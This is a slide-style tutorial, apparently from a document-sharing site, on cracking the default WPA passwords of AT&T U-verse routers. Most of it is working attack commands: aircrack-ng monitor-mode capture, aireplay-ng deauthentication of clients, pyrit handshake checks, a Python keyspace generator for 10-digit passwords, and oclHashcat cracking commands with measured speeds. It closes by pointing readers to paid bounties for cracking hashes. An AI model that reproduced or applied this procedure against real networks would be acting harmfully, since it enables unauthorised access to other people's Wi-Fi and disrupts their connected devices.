CrackingWPA

Report
Cracking AT&T U-verse Default
WPA1/2 Passwords.
by Jason Wheeler
Awesome blog: http://blog.init6.me
E
Getting the Handshake
Aircrack's site has a pretty good tutorial.
Boot from Back Track 5 R3
First you want to see what kind of wifi connection you have to choose from.
Start your wireless interface in monitor mode.
#airmon-zc start wlan0
#airodump-ng --encrypt wpa mon0
#airmon-zc stop mon0
Start airmon-zc on the channel of the target.
#airmon-zc start wlan0 <Channel Number>
Then start airodump on the same channel along with some other options.
#airodump-ng mon0 --encrypt wpa --write <FILENAME> --output-format
pcap -a --channel <Channel number>
Deauthenticate a client
#aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2
mon0
Where:
-0 means deauthentication
5 is the number of deauths to send
-a 00:14:6C:7E:40:80 is the MAC address of the access point
-c 00:0F:B5:FD:FB:C2 is the MAC address of the client you are
deauthing
mon0 is the interface name
•
•
•
•
•
WPA Handshake
Verify 4-way Handshake
PMK = PBKDF2(passphrase, ssid, ssidLength, 4096, 256)
The PTK is a keyed-HMAC function using the PMK on the
two MAC addresses and the two nonces from the first two
packets of the 4-Way Handshake.
Verify 4-way Handshake
The easy way......
#pyrit -r <FILENAME>.pcap analyze
Strip out the junk.
#pyrit -r <FILENAME>.pcap -o OUTPUT.pcap strip
CAP-2-HCCAP
To turn your pcap file into a hashcat-plus friendly file you can upload it
to https://hashcat.net/cap2hccap/
CRACK!!
Python Script
import sys
MAX_INT = 9999999999
BAD_PATTERNS = {x * 3 for x in '0123456789'}
for number in xrange(MAX_INT):
int_string = str(number).rjust(10, '0')
if any(pattern in int_string for pattern in BAD_PATTERNS):
continue
print ( int_string )
Hashcat-plus
$python 2wire.py | ./oclhashcat-plus64.bin -m 2500 -a 0
<filename>.hccap --gpu-accel=160 --gpu-loops=1024
88,770 c/s real
or
$./oclhashcat-plus64.bin -m 2500 -a 3 <filename>.hccap --gpuaccel=160 --gpu-loops=1024 -1?d ?1?1?1?1?1?1?1?1?1?1
114K c/s real
Crack for Bitcoin.
http://www.hashbounty.net/bounties
sources
http://etutorials.org/Networking/802.11+security.+wi-fi+protected+access+and+802.11i/Part+II+The+Design+of+WiFi+Security/Chapter+10.+WPA+and+RSN+Key+Hierarchy/

similar documents